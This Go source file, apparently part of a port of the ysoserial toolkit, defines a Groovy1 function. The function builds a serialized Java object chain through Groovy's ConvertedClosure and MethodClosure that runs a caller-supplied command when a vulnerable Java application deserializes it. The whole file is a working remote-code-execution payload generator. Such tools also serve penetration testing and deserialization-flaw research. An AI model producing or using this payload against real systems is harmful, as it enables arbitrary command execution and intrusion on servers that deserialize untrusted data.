package ysoserial

func Groovy1(cmd string) []byte {
	return ClassObject{
		name:             "sun.reflect.annotation.AnnotationInvocationHandler",
		serialVersionUID: 6182022883658399397,
		classDescFlags:   SC_SERIALIZABLE,
		fields: []Field{
			{"Ljava/util/Map;", "memberValues", ClassObject{
				name:              "java.util.Map",
				objectAnnotations: interfaces(),
				super: &ClassObject{
					name:             "java.lang.reflect.Proxy",
					serialVersionUID: -2222568056686623797,
					classDescFlags:   SC_SERIALIZABLE,
					fields: []Field{
						{"Ljava/lang/reflect/InvocationHandler;", "h", ClassObject{
							name:             "org.codehaus.groovy.runtime.ConvertedClosure",
							serialVersionUID: 1162833713450835227,
							classDescFlags:   SC_SERIALIZABLE,
							fields: []Field{
								{"Ljava/lang/String;", "methodName", "entrySet"},
							},
							objectAnnotations: interfaces(),
							super: &ClassObject{
								name:             "org.codehaus.groovy.runtime.ConversionHandler",
								serialVersionUID: 1162833717190835227,
								classDescFlags:   SC_SERIALIZABLE,
								fields: []Field{
									{"Ljava/lang/Object;", "delegate", ClassObject{
										name:             "org.codehaus.groovy.runtime.MethodClosure",
										serialVersionUID: 1228988487386910280,
										classDescFlags:   SC_SERIALIZABLE,
										fields: []Field{
											{Object, "method", "execute"},
										},
										objectAnnotations: interfaces(),
										super: &ClassObject{
											name:             "groovy.lang.Closure",
											serialVersionUID: 4368710879820278874,
											classDescFlags:   SC_SERIALIZABLE,
											fields: []Field{
												{Integer, "directive", 0},
												{Integer, "maximumNumberOfParameters", 2},
												{Integer, "resolveStrategy", 0},
												{"Lorg/codehaus/groovy/runtime/callsite/BooleanClosureWrapper;", "bcw", nil},
												{Object, "delegate", cmd},
												{Object, "owner", nil},
												{"[Ljava/lang/Class;", "parameterTypes", ArrayObject{
													name:             "[Ljava.lang.Class;",
													serialVersionUID: -6118465897992725863,
													classDescFlags:   SC_SERIALIZABLE,
													values: interfaces(
														ArrayObject{
															name:             "groovy.lang.Closure",
															serialVersionUID: 4368710879820278874,
															classDescFlags:   SC_SERIALIZABLE,
														}, ClassObject{
															name:             "java.io.File",
															serialVersionUID: 301077366599181567,
															classDescFlags:   SC_SERIALIZABLE | SC_WRITE_METHOD,
															fields: []Field{
																{Object, "path", nil},
															},
															objectAnnotations: interfaces(),
															super:             nil,
														},
													),
												}},
												{Object, "thisObject", ""},
											},
											objectAnnotations: interfaces(),
											super:             nil,
										},
									}},
									{"Ljava/util/concurrent/ConcurrentHashMap;", "handleCache", ClassObject{
										name:             "java.util.concurrent.ConcurrentHashMap",
										serialVersionUID: 7249069246763182397,
										classDescFlags:   SC_SERIALIZABLE | SC_WRITE_METHOD,
										fields: []Field{
											{Integer, "segmentMask", 15},
											{Integer, "segmentShift", 28},
											{"[Ljava/util/concurrent/ConcurrentHashMap$Segment;", "segments", ArrayObject{
												name:             "[Ljava.util.concurrent.ConcurrentHashMap$Segment;",
												serialVersionUID: 5942287782593116532,
												classDescFlags:   SC_SERIALIZABLE,
												values: interfaces(
													ClassObject{
														name:             "java.util.concurrent.ConcurrentHashMap$Segment",
														serialVersionUID: 2249069246763182397,
														classDescFlags:   SC_SERIALIZABLE,
														fields: []Field{
															{Float, "loadFactor", 0.75},
														},
														objectAnnotations: interfaces(),
														super: &ClassObject{
															name:             "java.util.concurrent.locks.ReentrantLock",
															serialVersionUID: 7373984872572414699,
															classDescFlags:   SC_SERIALIZABLE,
															fields: []Field{
																{"Ljava/util/concurrent/locks/ReentrantLock$Sync;", "sync", ClassObject{
																	name:              "java.util.concurrent.locks.ReentrantLock$NonfairSync",
																	serialVersionUID:  7316153563782823691,
																	classDescFlags:    SC_SERIALIZABLE,
																	fields:            []Field{},
																	objectAnnotations: interfaces(),
																	super: &ClassObject{
																		name:              "java.util.concurrent.locks.ReentrantLock$Sync",
																		serialVersionUID:  -5179523762034025860,
																		classDescFlags:    SC_SERIALIZABLE,
																		fields:            []Field{},
																		objectAnnotations: interfaces(),
																		super: &ClassObject{
																			name:             "java.util.concurrent.locks.AbstractQueuedSynchronizer",
																			serialVersionUID: 7373984972572414691,
																			classDescFlags:   SC_SERIALIZABLE,
																			fields: []Field{
																				{Integer, "state", 0},
																			},
																			objectAnnotations: interfaces(),
																			super: &ClassObject{
																				name:              "java.util.concurrent.locks.AbstractOwnableSynchronizer",
																				serialVersionUID:  3737899427754241961,
																				classDescFlags:    SC_SERIALIZABLE,
																				fields:            []Field{},
																				objectAnnotations: interfaces(),
																				super:             nil,
																			},
																		},
																	},
																}},
															},
															objectAnnotations: interfaces(),
															super:             nil,
														},
													}, ClassObject{
														name:             "java.util.concurrent.ConcurrentHashMap$Segment",
														serialVersionUID: 2249069246763182397,
														classDescFlags:   SC_SERIALIZABLE,
														fields: []Field{
															{Float, "loadFactor", 0.75},
														},
														objectAnnotations: interfaces(),
														super: &ClassObject{
															name:             "java.util.concurrent.locks.ReentrantLock",
															serialVersionUID: 7373984872572414699,
															classDescFlags:   SC_SERIALIZABLE,
															fields: []Field{
																{"Ljava/util/concurrent/locks/ReentrantLock$Sync;", "sync", ClassObject{
																	name:              "java.util.concurrent.locks.ReentrantLock$NonfairSync",
																	serialVersionUID:  7316153563782823691,
																	classDescFlags:    SC_SERIALIZABLE,
																	fields:            []Field{},
																	objectAnnotations: interfaces(),
																	super: &ClassObject{
																		name:              "java.util.concurrent.locks.ReentrantLock$Sync",
																		serialVersionUID:  -5179523762034025860,
																		classDescFlags:    SC_SERIALIZABLE,
																		fields:            []Field{},
																		objectAnnotations: interfaces(),
																		super: &ClassObject{
																			name:             "java.util.concurrent.locks.AbstractQueuedSynchronizer",
																			serialVersionUID: 7373984972572414691,
																			classDescFlags:   SC_SERIALIZABLE,
																			fields: []Field{
																				{Integer, "state", 0},
																			},
																			objectAnnotations: interfaces(),
																			super: &ClassObject{
																				name:              "java.util.concurrent.locks.AbstractOwnableSynchronizer",
																				serialVersionUID:  3737899427754241961,
																				classDescFlags:    SC_SERIALIZABLE,
																				fields:            []Field{},
																				objectAnnotations: interfaces(),
																				super:             nil,
																			},
																		},
																	},
																}},
															},
															objectAnnotations: interfaces(),
															super:             nil,
														},
													}, ClassObject{
														name:             "java.util.concurrent.ConcurrentHashMap$Segment",
														serialVersionUID: 2249069246763182397,
														classDescFlags:   SC_SERIALIZABLE,
														fields: []Field{
															{Float, "loadFactor", 0.75},
														},
														objectAnnotations: interfaces(),
														super: &ClassObject{
															name:             "java.util.concurrent.locks.ReentrantLock",
															serialVersionUID: 7373984872572414699,
															classDescFlags:   SC_SERIALIZABLE,
															fields: []Field{
																{"Ljava/util/concurrent/locks/ReentrantLock$Sync;", "sync", ClassObject{
																	name:              "java.util.concurrent.locks.ReentrantLock$NonfairSync",
																	serialVersionUID:  7316153563782823691,
																	classDescFlags:    SC_SERIALIZABLE,
																	fields:            []Field{},
																	objectAnnotations: interfaces(),
																	super: &ClassObject{
																		name:              "java.util.concurrent.locks.ReentrantLock$Sync",
																		serialVersionUID:  -5179523762034025860,
																		classDescFlags:    SC_SERIALIZABLE,
																		fields:            []Field{},
																		objectAnnotations: interfaces(),
																		super: &ClassObject{
																			name:             "java.util.concurrent.locks.AbstractQueuedSynchronizer",
																			serialVersionUID: 7373984972572414691,
																			classDescFlags:   SC_SERIALIZABLE,
																			fields: []Field{
																				{Integer, "state", 0},
																			},
																			objectAnnotations: interfaces(),
																			super: &ClassObject{
																				name:              "java.util.concurrent.locks.AbstractOwnableSynchronizer",
																				serialVersionUID:  3737899427754241961,
																				classDescFlags:    SC_SERIALIZABLE,
																				fields:            []Field{},
																				objectAnnotations: interfaces(),
																				super:             nil,
																			},
																		},
																	},
																}},
															},
															objectAnnotations: interfaces(),
															super:             nil,
														},
													}, ClassObject{
														name:             "java.util.concurrent.ConcurrentHashMap$Segment",
														serialVersionUID: 2249069246763182397,
														classDescFlags:   SC_SERIALIZABLE,
														fields: []Field{
															{Float, "loadFactor", 0.75},
														},
														objectAnnotations: interfaces(),
														super: &ClassObject{
															name:             "java.util.concurrent.locks.ReentrantLock",
															serialVersionUID: 7373984872572414699,
															classDescFlags:   SC_SERIALIZABLE,
															fields: []Field{
																{"Ljava/util/concurrent/locks/ReentrantLock$Sync;", "sync", ClassObject{
																	name:              "java.util.concurrent.locks.ReentrantLock$NonfairSync",
																	serialVersionUID:  7316153563782823691,
																	classDescFlags:    SC_SERIALIZABLE,
																	fields:            []Field{},
																	objectAnnotations: interfaces(),
																	super: &ClassObject{
																		name:              "java.util.concurrent.locks.ReentrantLock$Sync",
																		serialVersionUID:  -5179523762034025860,
																		classDescFlags:    SC_SERIALIZABLE,
																		fields:            []Field{},
																		objectAnnotations: interfaces(),
																		super: &ClassObject{
																			name:             "java.util.concurrent.locks.AbstractQueuedSynchronizer",
																			serialVersionUID: 7373984972572414691,
																			classDescFlags:   SC_SERIALIZABLE,
																			fields: []Field{
																				{Integer, "state", 0},
																			},
																			objectAnnotations: interfaces(),
																			super: &ClassObject{
																				name:              "java.util.concurrent.locks.AbstractOwnableSynchronizer",
																				serialVersionUID:  3737899427754241961,
																				classDescFlags:    SC_SERIALIZABLE,
																				fields:            []Field{},
																				objectAnnotations: interfaces(),
																				super:             nil,
																			},
																		},
																	},
																}},
															},
															objectAnnotations: interfaces(),
															super:             nil,
														},
													}, ClassObject{
														name:             "java.util.concurrent.ConcurrentHashMap$Segment",
														serialVersionUID: 2249069246763182397,
														classDescFlags:   SC_SERIALIZABLE,
														fields: []Field{
															{Float, "loadFactor", 0.75},
														},
														objectAnnotations: interfaces(),
														super: &ClassObject{
															name:             "java.util.concurrent.locks.ReentrantLock",
															serialVersionUID: 7373984872572414699,
															classDescFlags:   SC_SERIALIZABLE,
															fields: []Field{
																{"Ljava/util/concurrent/locks/ReentrantLock$Sync;", "sync", ClassObject{
																	name:              "java.util.concurrent.locks.ReentrantLock$NonfairSync",
																	serialVersionUID:  7316153563782823691,
																	classDescFlags:    SC_SERIALIZABLE,
																	fields:            []Field{},
																	objectAnnotations: interfaces(),
																	super: &ClassObject{
																		name:              "java.util.concurrent.locks.ReentrantLock$Sync",
																		serialVersionUID:  -5179523762034025860,
																		classDescFlags:    SC_SERIALIZABLE,
																		fields:            []Field{},
																		objectAnnotations: interfaces(),
																		super: &ClassObject{
																			name:             "java.util.concurrent.locks.AbstractQueuedSynchronizer",
																			serialVersionUID: 7373984972572414691,
																			classDescFlags:   SC_SERIALIZABLE,
																			fields: []Field{
																				{Integer, "state", 0},
																			},
																			objectAnnotations: interfaces(),
																			super: &ClassObject{
																				name:              "java.util.concurrent.locks.AbstractOwnableSynchronizer",
																				serialVersionUID:  3737899427754241961,
																				classDescFlags:    SC_SERIALIZABLE,
																				fields:            []Field{},
																				objectAnnotations: interfaces(),
																				super:             nil,
																			},
																		},
																	},
																}},
															},
															objectAnnotations: interfaces(),
															super:             nil,
														},
													}, ClassObject{
														name:             "java.util.concurrent.ConcurrentHashMap$Segment",
														serialVersionUID: 2249069246763182397,
														classDescFlags:   SC_SERIALIZABLE,
														fields: []Field{
															{Float, "loadFactor", 0.75},
														},
														objectAnnotations: interfaces(),
														super: &ClassObject{
															name:             "java.util.concurrent.locks.ReentrantLock",
															serialVersionUID: 7373984872572414699,
															classDescFlags:   SC_SERIALIZABLE,
															fields: []Field{
																{"Ljava/util/concurrent/locks/ReentrantLock$Sync;", "sync", ClassObject{
																	name:              "java.util.concurrent.locks.ReentrantLock$NonfairSync",
																	serialVersionUID:  7316153563782823691,
																	classDescFlags:    SC_SERIALIZABLE,
																	fields:            []Field{},
																	objectAnnotations: interfaces(),
																	super: &ClassObject{
																		name:              "java.util.concurrent.locks.ReentrantLock$Sync",
																		serialVersionUID:  -5179523762034025860,
																		classDescFlags:    SC_SERIALIZABLE,
																		fields:            []Field{},
																		objectAnnotations: interfaces(),
																		super: &ClassObject{
																			name:             "java.util.concurrent.locks.AbstractQueuedSynchronizer",
																			serialVersionUID: 7373984972572414691,
																			classDescFlags:   SC_SERIALIZABLE,
																			fields: []Field{
																				{Integer, "state", 0},
																			},
																			objectAnnotations: interfaces(),
																			super: &ClassObject{
																				name:              "java.util.concurrent.locks.AbstractOwnableSynchronizer",
																				serialVersionUID:  3737899427754241961,
																				classDescFlags:    SC_SERIALIZABLE,
																				fields:            []Field{},
																				objectAnnotations: interfaces(),
																				super:             nil,
																			},
																		},
																	},
																}},
															},
															objectAnnotations: interfaces(),
															super:             nil,
														},
													}, ClassObject{
														name:             "java.util.concurrent.ConcurrentHashMap$Segment",
														serialVersionUID: 2249069246763182397,
														classDescFlags:   SC_SERIALIZABLE,
														fields: []Field{
															{Float, "loadFactor", 0.75},
														},
														objectAnnotations: interfaces(),
														super: &ClassObject{
															name:             "java.util.concurrent.locks.ReentrantLock",
															serialVersionUID: 7373984872572414699,
															classDescFlags:   SC_SERIALIZABLE,
															fields: []Field{
																{"Ljava/util/concurrent/locks/ReentrantLock$Sync;", "sync", ClassObject{
																	name:              "java.util.concurrent.locks.ReentrantLock$NonfairSync",
																	serialVersionUID:  7316153563782823691,
																	classDescFlags:    SC_SERIALIZABLE,
																	fields:            []Field{},
																	objectAnnotations: interfaces(),
																	super: &ClassObject{
																		name:              "java.util.concurrent.locks.ReentrantLock$Sync",
																		serialVersionUID:  -5179523762034025860,
																		classDescFlags:    SC_SERIALIZABLE,
																		fields:            []Field{},
																		objectAnnotations: interfaces(),
																		super: &ClassObject{
																			name:             "java.util.concurrent.locks.AbstractQueuedSynchronizer",
																			serialVersionUID: 7373984972572414691,
																			classDescFlags:   SC_SERIALIZABLE,
																			fields: []Field{
																				{Integer, "state", 0},
																			},
																			objectAnnotations: interfaces(),
																			super: &ClassObject{
																				name:              "java.util.concurrent.locks.AbstractOwnableSynchronizer",
																				serialVersionUID:  3737899427754241961,
																				classDescFlags:    SC_SERIALIZABLE,
																				fields:            []Field{},
																				objectAnnotations: interfaces(),
																				super:             nil,
																			},
																		},
																	},
																}},
															},
															objectAnnotations: interfaces(),
															super:             nil,
														},
													}, ClassObject{
														name:             "java.util.concurrent.ConcurrentHashMap$Segment",
														serialVersionUID: 2249069246763182397,
														classDescFlags:   SC_SERIALIZABLE,
														fields: []Field{
															{Float, "loadFactor", 0.75},
														},
														objectAnnotations: interfaces(),
														super: &ClassObject{
															name:             "java.util.concurrent.locks.ReentrantLock",
															serialVersionUID: 7373984872572414699,
															classDescFlags:   SC_SERIALIZABLE,
															fields: []Field{
																{"Ljava/util/concurrent/locks/ReentrantLock$Sync;", "sync", ClassObject{
																	name:              "java.util.concurrent.locks.ReentrantLock$NonfairSync",
																	serialVersionUID:  7316153563782823691,
																	classDescFlags:    SC_SERIALIZABLE,
																	fields:            []Field{},
																	objectAnnotations: interfaces(),
																	super: &ClassObject{
																		name:              "java.util.concurrent.locks.ReentrantLock$Sync",
																		serialVersionUID:  -5179523762034025860,
																		classDescFlags:    SC_SERIALIZABLE,
																		fields:            []Field{},
																		objectAnnotations: interfaces(),
																		super: &ClassObject{
																			name:             "java.util.concurrent.locks.AbstractQueuedSynchronizer",
																			serialVersionUID: 7373984972572414691,
																			classDescFlags:   SC_SERIALIZABLE,
																			fields: []Field{
																				{Integer, "state", 0},
																			},
																			objectAnnotations: interfaces(),
																			super: &ClassObject{
																				name:              "java.util.concurrent.locks.AbstractOwnableSynchronizer",
																				serialVersionUID:  3737899427754241961,
																				classDescFlags:    SC_SERIALIZABLE,
																				fields:            []Field{},
																				objectAnnotations: interfaces(),
																				super:             nil,
																			},
																		},
																	},
																}},
															},
															objectAnnotations: interfaces(),
															super:             nil,
														},
													}, ClassObject{
														name:             "java.util.concurrent.ConcurrentHashMap$Segment",
														serialVersionUID: 2249069246763182397,
														classDescFlags:   SC_SERIALIZABLE,
														fields: []Field{
															{Float, "loadFactor", 0.75},
														},
														objectAnnotations: interfaces(),
														super: &ClassObject{
															name:             "java.util.concurrent.locks.ReentrantLock",
															serialVersionUID: 7373984872572414699,
															classDescFlags:   SC_SERIALIZABLE,
															fields: []Field{
																{"Ljava/util/concurrent/locks/ReentrantLock$Sync;", "sync", ClassObject{
																	name:              "java.util.concurrent.locks.ReentrantLock$NonfairSync",
																	serialVersionUID:  7316153563782823691,
																	classDescFlags:    SC_SERIALIZABLE,
																	fields:            []Field{},
																	objectAnnotations: interfaces(),
																	super: &ClassObject{
																		name:              "java.util.concurrent.locks.ReentrantLock$Sync",
																		serialVersionUID:  -5179523762034025860,
																		classDescFlags:    SC_SERIALIZABLE,
																		fields:            []Field{},
																		objectAnnotations: interfaces(),
																		super: &ClassObject{
																			name:             "java.util.concurrent.locks.AbstractQueuedSynchronizer",
																			serialVersionUID: 7373984972572414691,
																			classDescFlags:   SC_SERIALIZABLE,
																			fields: []Field{
																				{Integer, "state", 0},
																			},
																			objectAnnotations: interfaces(),
																			super: &ClassObject{
																				name:              "java.util.concurrent.locks.AbstractOwnableSynchronizer",
																				serialVersionUID:  3737899427754241961,
																				classDescFlags:    SC_SERIALIZABLE,
																				fields:            []Field{},
																				objectAnnotations: interfaces(),
																				super:             nil,
																			},
																		},
																	},
																}},
															},
															objectAnnotations: interfaces(),
															super:             nil,
														},
													}, ClassObject{
														name:             "java.util.concurrent.ConcurrentHashMap$Segment",
														serialVersionUID: 2249069246763182397,
														classDescFlags:   SC_SERIALIZABLE,
														fields: []Field{
															{Float, "loadFactor", 0.75},
														},
														objectAnnotations: interfaces(),
														super: &ClassObject{
															name:             "java.util.concurrent.locks.ReentrantLock",
															serialVersionUID: 7373984872572414699,
															classDescFlags:   SC_SERIALIZABLE,
															fields: []Field{
																{"Ljava/util/concurrent/locks/ReentrantLock$Sync;", "sync", ClassObject{
																	name:              "java.util.concurrent.locks.ReentrantLock$NonfairSync",
																	serialVersionUID:  7316153563782823691,
																	classDescFlags:    SC_SERIALIZABLE,
																	fields:            []Field{},
																	objectAnnotations: interfaces(),
																	super: &ClassObject{
																		name:              "java.util.concurrent.locks.ReentrantLock$Sync",
																		serialVersionUID:  -5179523762034025860,
																		classDescFlags:    SC_SERIALIZABLE,
																		fields:            []Field{},
																		objectAnnotations: interfaces(),
																		super: &ClassObject{
																			name:             "java.util.concurrent.locks.AbstractQueuedSynchronizer",
																			serialVersionUID: 7373984972572414691,
																			classDescFlags:   SC_SERIALIZABLE,
																			fields: []Field{
																				{Integer, "state", 0},
																			},
																			objectAnnotations: interfaces(),
																			super: &ClassObject{
																				name:              "java.util.concurrent.locks.AbstractOwnableSynchronizer",
																				serialVersionUID:  3737899427754241961,
																				classDescFlags:    SC_SERIALIZABLE,
																				fields:            []Field{},
																				objectAnnotations: interfaces(),
																				super:             nil,
																			},
																		},
																	},
																}},
															},
															objectAnnotations: interfaces(),
															super:             nil,
														},
													}, ClassObject{
														name:             "java.util.concurrent.ConcurrentHashMap$Segment",
														serialVersionUID: 2249069246763182397,
														classDescFlags:   SC_SERIALIZABLE,
														fields: []Field{
															{Float, "loadFactor", 0.75},
														},
														objectAnnotations: interfaces(),
														super: &ClassObject{
															name:             "java.util.concurrent.locks.ReentrantLock",
															serialVersionUID: 7373984872572414699,
															classDescFlags:   SC_SERIALIZABLE,
															fields: []Field{
																{"Ljava/util/concurrent/locks/ReentrantLock$Sync;", "sync", ClassObject{
																	name:              "java.util.concurrent.locks.ReentrantLock$NonfairSync",
																	serialVersionUID:  7316153563782823691,
																	classDescFlags:    SC_SERIALIZABLE,
																	fields:            []Field{},
																	objectAnnotations: interfaces(),
																	super: &ClassObject{
																		name:              "java.util.concurrent.locks.ReentrantLock$Sync",
																		serialVersionUID:  -5179523762034025860,
																		classDescFlags:    SC_SERIALIZABLE,
																		fields:            []Field{},
																		objectAnnotations: interfaces(),
																		super: &ClassObject{
																			name:             "java.util.concurrent.locks.AbstractQueuedSynchronizer",
																			serialVersionUID: 7373984972572414691,
																			classDescFlags:   SC_SERIALIZABLE,
																			fields: []Field{
																				{Integer, "state", 0},
																			},
																			objectAnnotations: interfaces(),
																			super: &ClassObject{
																				name:              "java.util.concurrent.locks.AbstractOwnableSynchronizer",
																				serialVersionUID:  3737899427754241961,
																				classDescFlags:    SC_SERIALIZABLE,
																				fields:            []Field{},
																				objectAnnotations: interfaces(),
																				super:             nil,
																			},
																		},
																	},
																}},
															},
															objectAnnotations: interfaces(),
															super:             nil,
														},
													}, ClassObject{
														name:             "java.util.concurrent.ConcurrentHashMap$Segment",
														serialVersionUID: 2249069246763182397,
														classDescFlags:   SC_SERIALIZABLE,
														fields: []Field{
															{Float, "loadFactor", 0.75},
														},
														objectAnnotations: interfaces(),
														super: &ClassObject{
															name:             "java.util.concurrent.locks.ReentrantLock",
															serialVersionUID: 7373984872572414699,
															classDescFlags:   SC_SERIALIZABLE,
															fields: []Field{
																{"Ljava/util/concurrent/locks/ReentrantLock$Sync;", "sync", ClassObject{
																	name:              "java.util.concurrent.locks.ReentrantLock$NonfairSync",
																	serialVersionUID:  7316153563782823691,
																	classDescFlags:    SC_SERIALIZABLE,
																	fields:            []Field{},
																	objectAnnotations: interfaces(),
																	super: &ClassObject{
																		name:              "java.util.concurrent.locks.ReentrantLock$Sync",
																		serialVersionUID:  -5179523762034025860,
																		classDescFlags:    SC_SERIALIZABLE,
																		fields:            []Field{},
																		objectAnnotations: interfaces(),
																		super: &ClassObject{
																			name:             "java.util.concurrent.locks.AbstractQueuedSynchronizer",
																			serialVersionUID: 7373984972572414691,
																			classDescFlags:   SC_SERIALIZABLE,
																			fields: []Field{
																				{Integer, "state", 0},
																			},
																			objectAnnotations: interfaces(),
																			super: &ClassObject{
																				name:              "java.util.concurrent.locks.AbstractOwnableSynchronizer",
																				serialVersionUID:  3737899427754241961,
																				classDescFlags:    SC_SERIALIZABLE,
																				fields:            []Field{},
																				objectAnnotations: interfaces(),
																				super:             nil,
																			},
																		},
																	},
																}},
															},
															objectAnnotations: interfaces(),
															super:             nil,
														},
													}, ClassObject{
														name:             "java.util.concurrent.ConcurrentHashMap$Segment",
														serialVersionUID: 2249069246763182397,
														classDescFlags:   SC_SERIALIZABLE,
														fields: []Field{
															{Float, "loadFactor", 0.75},
														},
														objectAnnotations: interfaces(),
														super: &ClassObject{
															name:             "java.util.concurrent.locks.ReentrantLock",
															serialVersionUID: 7373984872572414699,
															classDescFlags:   SC_SERIALIZABLE,
															fields: []Field{
																{"Ljava/util/concurrent/locks/ReentrantLock$Sync;", "sync", ClassObject{
																	name:              "java.util.concurrent.locks.ReentrantLock$NonfairSync",
																	serialVersionUID:  7316153563782823691,
																	classDescFlags:    SC_SERIALIZABLE,
																	fields:            []Field{},
																	objectAnnotations: interfaces(),
																	super: &ClassObject{
																		name:              "java.util.concurrent.locks.ReentrantLock$Sync",
																		serialVersionUID:  -5179523762034025860,
																		classDescFlags:    SC_SERIALIZABLE,
																		fields:            []Field{},
																		objectAnnotations: interfaces(),
																		super: &ClassObject{
																			name:             "java.util.concurrent.locks.AbstractQueuedSynchronizer",
																			serialVersionUID: 7373984972572414691,
																			classDescFlags:   SC_SERIALIZABLE,
																			fields: []Field{
																				{Integer, "state", 0},
																			},
																			objectAnnotations: interfaces(),
																			super: &ClassObject{
																				name:              "java.util.concurrent.locks.AbstractOwnableSynchronizer",
																				serialVersionUID:  3737899427754241961,
																				classDescFlags:    SC_SERIALIZABLE,
																				fields:            []Field{},
																				objectAnnotations: interfaces(),
																				super:             nil,
																			},
																		},
																	},
																}},
															},
															objectAnnotations: interfaces(),
															super:             nil,
														},
													}, ClassObject{
														name:             "java.util.concurrent.ConcurrentHashMap$Segment",
														serialVersionUID: 2249069246763182397,
														classDescFlags:   SC_SERIALIZABLE,
														fields: []Field{
															{Float, "loadFactor", 0.75},
														},
														objectAnnotations: interfaces(),
														super: &ClassObject{
															name:             "java.util.concurrent.locks.ReentrantLock",
															serialVersionUID: 7373984872572414699,
															classDescFlags:   SC_SERIALIZABLE,
															fields: []Field{
																{"Ljava/util/concurrent/locks/ReentrantLock$Sync;", "sync", ClassObject{
																	name:              "java.util.concurrent.locks.ReentrantLock$NonfairSync",
																	serialVersionUID:  7316153563782823691,
																	classDescFlags:    SC_SERIALIZABLE,
																	fields:            []Field{},
																	objectAnnotations: interfaces(),
																	super: &ClassObject{
																		name:              "java.util.concurrent.locks.ReentrantLock$Sync",
																		serialVersionUID:  -5179523762034025860,
																		classDescFlags:    SC_SERIALIZABLE,
																		fields:            []Field{},
																		objectAnnotations: interfaces(),
																		super: &ClassObject{
																			name:             "java.util.concurrent.locks.AbstractQueuedSynchronizer",
																			serialVersionUID: 7373984972572414691,
																			classDescFlags:   SC_SERIALIZABLE,
																			fields: []Field{
																				{Integer, "state", 0},
																			},
																			objectAnnotations: interfaces(),
																			super: &ClassObject{
																				name:              "java.util.concurrent.locks.AbstractOwnableSynchronizer",
																				serialVersionUID:  3737899427754241961,
																				classDescFlags:    SC_SERIALIZABLE,
																				fields:            []Field{},
																				objectAnnotations: interfaces(),
																				super:             nil,
																			},
																		},
																	},
																}},
															},
															objectAnnotations: interfaces(),
															super:             nil,
														},
													}, ClassObject{
														name:             "java.util.concurrent.ConcurrentHashMap$Segment",
														serialVersionUID: 2249069246763182397,
														classDescFlags:   SC_SERIALIZABLE,
														fields: []Field{
															{Float, "loadFactor", 0.75},
														},
														objectAnnotations: interfaces(),
														super: &ClassObject{
															name:             "java.util.concurrent.locks.ReentrantLock",
															serialVersionUID: 7373984872572414699,
															classDescFlags:   SC_SERIALIZABLE,
															fields: []Field{
																{"Ljava/util/concurrent/locks/ReentrantLock$Sync;", "sync", ClassObject{
																	name:              "java.util.concurrent.locks.ReentrantLock$NonfairSync",
																	serialVersionUID:  7316153563782823691,
																	classDescFlags:    SC_SERIALIZABLE,
																	fields:            []Field{},
																	objectAnnotations: interfaces(),
																	super: &ClassObject{
																		name:              "java.util.concurrent.locks.ReentrantLock$Sync",
																		serialVersionUID:  -5179523762034025860,
																		classDescFlags:    SC_SERIALIZABLE,
																		fields:            []Field{},
																		objectAnnotations: interfaces(),
																		super: &ClassObject{
																			name:             "java.util.concurrent.locks.AbstractQueuedSynchronizer",
																			serialVersionUID: 7373984972572414691,
																			classDescFlags:   SC_SERIALIZABLE,
																			fields: []Field{
																				{Integer, "state", 0},
																			},
																			objectAnnotations: interfaces(),
																			super: &ClassObject{
																				name:              "java.util.concurrent.locks.AbstractOwnableSynchronizer",
																				serialVersionUID:  3737899427754241961,
																				classDescFlags:    SC_SERIALIZABLE,
																				fields:            []Field{},
																				objectAnnotations: interfaces(),
																				super:             nil,
																			},
																		},
																	},
																}},
															},
															objectAnnotations: interfaces(),
															super:             nil,
														},
													}),
											}},
										},
										objectAnnotations: interfaces(),
										super:             nil,
									}},
								},
								objectAnnotations: interfaces(),
								super:             nil,
							},
						}},
					},
					objectAnnotations: interfaces(),
					super:             nil,
				},
			}},
			{"Ljava/lang/Class;", "type", ClassObject{
				name:              "java.lang.Override",
				serialVersionUID:  0,
				classDescFlags:    0x00,
				fields:            []Field{},
				objectAnnotations: interfaces(),
				super:             nil,
			}},
		},
		objectAnnotations: interfaces(),
		super:             nil,
	}.SerializeWithMagicHeader()
}
